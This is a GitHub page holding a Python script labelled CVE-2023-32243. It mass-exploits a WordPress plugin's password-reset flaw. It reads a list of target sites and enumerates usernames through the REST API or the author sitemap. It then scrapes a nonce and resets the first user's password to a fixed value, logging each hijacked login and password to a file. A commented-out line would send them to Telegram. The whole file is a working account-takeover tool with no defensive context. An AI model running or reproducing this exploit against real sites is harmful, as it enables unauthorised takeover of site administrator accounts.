-
Notifications
You must be signed in to change notification settings - Fork 7
/
CVE-2023-32243.py
84 lines (74 loc) · 2.91 KB
/
CVE-2023-32243.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
import requests,time,re,random,os,sys,json
from multiprocessing.dummy import Pool as ThreadPool
from colorama import Fore,Style, init
init(autoreset=True)
r = Fore.RED + Style.BRIGHT
g = Fore.GREEN + Style.BRIGHT
c = Fore.CYAN + Style.BRIGHT
y = Fore.YELLOW + Style.BRIGHT
o = Fore.RESET + Style.RESET_ALL
headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/113.0',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8',
'Accept-Language': 'en-US,en;q=0.5',
# 'Accept-Encoding': 'gzip, deflate, br',
'Content-Type': 'application/x-www-form-urlencoded',
'Connection': 'keep-alive',
# 'Cookie': 'wordpress_test_cookie=WP%20Cookie%20check; slimstat_tracking_code=3386.b77ee445be809a12d617d72914d52783',
'Upgrade-Insecure-Requests': '1',
'Sec-Fetch-Dest': 'document',
'Sec-Fetch-Mode': 'navigate',
'Sec-Fetch-Site': 'same-origin',
'Sec-Fetch-User': '?1',
}
def ambil_User(url):
try:
ngambil = requests.get('http://'+url+'/wp-json/wp/v2/users',headers=headers,timeout=10)
if '"slug":"' in ngambil.content:
hasil = re.findall('"slug":"(.*?)"', ngambil.text)
user = hasil[0]
RANDOME(url,user)
else:
print(y+'http://'+url+ ' ' +r+ 'FAILED GET USERNAME'+o)
ngambile = requests.get('http://'+url+'/author-sitemap.xml',headers=headers,timeout=10)
if 'Sitemap' in ngambile.content:
jancok = re.findall('author/(.*?)/',ngambile.text)
user = jancok[0]
RANDOME(url,user)
else:
print(y+'http://'+url+ ' ' +r+ 'FAILED GET USERNAME'+o)
except:
pass
def RANDOME(url,user):
try:
response = requests.get('http://'+url, headers=headers,timeout=10).content
if 'ajaxurl' in response:
nonce = re.findall('admin-ajax.php","nonce":"(.*?)"',response)[0]
payload = {
"action": "login_or_register_user",
"eael-resetpassword-submit": "true",
"page_id": "124",
"widget_id": "224",
"eael-resetpassword-nonce": nonce,
"eael-pass1": 'Shin_Code403',
"eael-pass2": 'Shin_Code403',
"rp_login": user
}
response2 = requests.post('http://'+url+'/wp-admin/admin-ajax.php', headers=headers, data=payload,timeout=10)
if 'success":true' in response2.text:
print(y+'GAS' + ' ==> ' +g+ 'http://'+url+'/wp-login.php' +'|'+ user + '|' + 'Shin_Code403'+o)
open('resulst.txt','a').write('http://'+url+'/wp-login.php' +'|'+ user + '|' + 'Shin_Code403'+'\n')
#send_to_telegram('http://'+url+'/wp-login.php' +'|'+ user + '|' + 'Shin_Code403'+'\n')
else:
print('http://'+url+' '+r+ 'BAD'+o)
except:
#print(e)
pass
if __name__ == '__main__':
os.system('cls' if os.name == 'nt' else 'clear')
print "{} CVE-2023-32243 | {}Shin Code\n".format(y,c)
url = open(raw_input('List:~# '),'r').read().replace('http://','').replace('https://','').splitlines()
pool = ThreadPool(int(20))
pool.map(ambil_User, url)
pool.close()
pool.join()